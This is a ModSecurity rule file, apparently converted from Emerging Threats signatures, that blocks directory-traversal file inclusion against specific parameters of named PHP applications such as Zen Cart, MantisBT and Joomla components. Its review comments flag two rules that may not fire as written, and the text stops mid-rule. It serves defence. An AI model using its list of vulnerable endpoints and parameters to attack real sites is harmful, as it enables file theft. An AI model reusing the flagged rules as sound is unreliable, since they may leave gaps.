SecRule ARGS:owa_action "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Open Web Analytics owa_action Parameter Local File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2011883) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Open Web Analytics owa_do Parameter Local File inclusion Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011883,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Open Web Analytics owa_do Parameter Local File inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:owa_do "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Open Web Analytics owa_do Parameter Local File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2011884) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS iGaming CMS loadplugin.php load Parameter Local File inclusion Attempt SecRule REQUEST_LINE "@contains /admin/loadplugin.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011884,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS iGaming CMS loadplugin.php load Parameter Local File inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:load "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS iGaming CMS loadplugin.php load Parameter Local File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2011936) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Dolphin BxDolGzip.php file Disclosure 
Attempt SecRule REQUEST_LINE "@contains /classes/BxDolGzip.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011936,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Dolphin BxDolGzip.php file Disclosure Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:file "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Dolphin BxDolGzip.php file Disclosure Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2011928) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS TFTgallery adminlangfile Parameter Local File inclusion Attempt SecRule REQUEST_LINE "@contains /admin/thumbnailformpost.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011928,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS TFTgallery adminlangfile Parameter Local File inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:adminlangfile "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS TFTgallery adminlangfile Parameter Local File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2011941) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Open Source Support Ticket System module.php Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /module.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011941,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Open Source Support Ticket System module.php Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains module=osTicket" "chain" 
SecRule ARGS:file "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Open Source Support Ticket System module.php Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2012008) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpCow skin_file Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /plugins/templateie/lib/templateie_install.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012008,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS phpCow skin_file Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:skin_file "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpCow skin_file Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2012010) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Zen Cart loader_file Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /includes/initsystem.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012010,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Zen Cart loader_file Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:loader_file "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Zen Cart loader_file Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2012012) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS The Uploader download_launch.php Remote File 
Disclosure Attempt SecRule REQUEST_LINE "@contains /api/download_launch.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012012,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS The Uploader download_launch.php Remote File Disclosure Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:filename "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS The Uploader download_launch.php Remote File Disclosure Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2012014) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Jimtawl Component task Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012014,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Jimtawl Component task Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_jimtawl" "chain" SecRule ARGS:task "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Jimtawl Component task Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2012022) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Community Builder Enhenced Component Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012022,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Community Builder Enhenced Component Local File Inclusion Attempt',tag:'web-application-attack'" SecRule 
REQUEST_LINE "@contains GET " "chain"
    SecRule REQUEST_LINE "@contains option=com_cbe" "chain"
    SecRule REQUEST_LINE "@contains task=userProfile" "chain"
    SecRule ARGS:tabname "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Community Builder Enhenced Component Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"
# (2012025) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Seo Panel file Parameter Local File Inclusion Attempt
# Five-part chain: /download.php, "GET ", filesec=sitemap and filetype=text
# must all appear in the request line before ARGS:file is tested.
# NOTE(review): the final test is "@contains ..//" (two slashes), where the
# other rules in this file test for "../". As written it requires the doubled
# slash in the value the chained rule sees; confirm against the upstream
# signature whether that is intended or a conversion artefact, and cover the
# rule with a regression test.
SecRule REQUEST_LINE "@contains /download.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012025,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Seo Panel file Parameter Local File Inclusion Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule REQUEST_LINE "@contains filesec=sitemap" "chain"
    SecRule REQUEST_LINE "@contains filetype=text" "chain"
    SecRule ARGS:file "@contains ..//" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Seo Panel file Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"
# (2012032) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Abtp Portal Project skel_null.php Local File Inclusion Attempt
# Three-part chain: path substring, "GET ", then ARGS:ABTPV_BLOQUE_CENTRAL
# containing ../ . Transformations are listed on the starter only.
SecRule REQUEST_LINE "@contains /includes/esqueletos/skel_null.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012032,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Abtp Portal Project skel_null.php Local File Inclusion Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:ABTPV_BLOQUE_CENTRAL "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Abtp Portal Project skel_null.php Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"
# (2012033) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS N-13 News default_login_language Parameter Local File Inclusion Attempt
# Same three-part shape as 2012032, testing ARGS:default_login_language.
SecRule REQUEST_LINE "@contains /modules/login.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012033,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS N-13 News default_login_language Parameter Local File Inclusion Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:default_login_language "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS N-13 News default_login_language Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"
# (2012069) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MantisBT db_type Parameter Local File Inclusion Attempt
# The last link names no @operator, so the quoted string is used as a regular
# expression against ARGS:db_type.
# NOTE(review): the pattern is written with a doubled backslash (\\x2f). What
# the regex engine receives depends on how the configuration parser unescapes
# backslashes inside the quoted argument: \x2f is a slash, whereas a literal
# backslash followed by "x2f" would never appear in a normal traversal value.
# Confirm with a regression test that the rule fires on a db_type value
# containing ../ .
SecRule REQUEST_LINE "@contains /admin/upgrade_unattended.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012069,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS MantisBT db_type Parameter Local File Inclusion Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:db_type "(?i:\.\.\\x2f)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MantisBT db_type Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"
# (2012071) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Google Urchin session.cgi Local File Inclusion Attempt
SecRule REQUEST_LINE "@contains app=urchin.cgi"
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012071,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Google Urchin session.cgi Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains action=prop" "chain" SecRule ARGS:gfid "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Google Urchin session.cgi Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2012122) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-1 SecRule REQUEST_LINE "@contains /modules/maticmarket/deco/blanc/haut.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012122,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-1',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:modulename "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-1',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2012123) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-2 SecRule REQUEST_LINE "@contains /modules/maticmarket/deco/blanc/bas.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012123,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-2',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:modulename "@contains ../" 
"ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-2',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2012124) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-3 SecRule REQUEST_LINE "@contains /modules/maticmarket/bleu/blanc/haut.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012124,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-3',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:modulename "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-3',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2012125) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-4 SecRule REQUEST_LINE "@contains /modules/maticmarket/bleu/blanc/bas.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012125,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-4',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:modulename "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-4',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2012126) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion 
Attempt-5 SecRule REQUEST_LINE "@contains /modules/maticmarket/bleu/default/haut.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012126,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-5',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:modulename "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-5',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2012127) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-6 SecRule REQUEST_LINE "@contains /modules/maticmarket/bleu/default/bas.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012127,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-6',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:modulename "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-6',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2012128) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-7 SecRule REQUEST_LINE "@contains /modules/maticmarket/bleu/gold/haut.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012128,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-7',tag:'web-application-attack'" SecRule REQUEST_LINE 
"@contains GET " "chain" SecRule ARGS:modulename "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-7',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2012129) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-8 SecRule REQUEST_LINE "@contains /modules/maticmarket/bleu/gold/bas.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012129,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-8',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:modulename "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-8',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2012166) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Component com_xmovie file Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /com_xmovie/helpers/img.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012166,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Component com_xmovie file Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:file "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Component com_xmovie file Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2012168) SpiderLabs Research (SLR) Public Vulns: ET 
WEB_SPECIFIC_APPS Tiki Wiki CMS Groupware language Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /tiki-jsplugin.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012168,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Tiki Wiki CMS Groupware language Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:language "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Tiki Wiki CMS Groupware language Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2012186) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS axdcms aXconf Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /modules/profile/user.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012186,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS axdcms aXconf Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:aXconf[default_language] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS axdcms aXconf Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2012217) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS LetoDMS lang Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /op/op.Login.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012217,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS LetoDMS lang Parameter Local File Inclusion Attempt',tag:'web-application-attack',tag:'bugtraq,37828'" SecRule REQUEST_LINE 
"@contains GET " "chain" SecRule ARGS:lang "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS LetoDMS lang Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2012336) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS CultBooking lang parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /cultbooking.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012336,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS CultBooking lang parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:lang "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS CultBooking lang parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2012343) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WeBid active_auctions.php lan Parameter Local File inclusion Attempt SecRule REQUEST_LINE "@contains /active_auctions.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012343,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WeBid active_auctions.php lan Parameter Local File inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:lan "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WeBid active_auctions.php lan Parameter Local File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2012345) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Frontend-User-Access controller Parameter Local File Inclusion 
Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012345,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Frontend-User-Access controller Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_frontenduseraccess" "chain" SecRule ARGS:controller "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Frontend-User-Access controller Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2012354) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Dokeos and Chamilo open_document.php file Parameter File Disclosure Attempt SecRule REQUEST_LINE "@contains /gradebook/open_document.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012354,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Dokeos and Chamilo open_document.php file Parameter File Disclosure Attempt',tag:'web-application-attack',tag:'bugtraq,46173'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:file "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Dokeos and Chamilo open_document.php file Parameter File Disclosure Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2012357) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla XGallery com_xgallery Component Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /components/com_xgallery/helpers/img.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012357,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla XGallery 
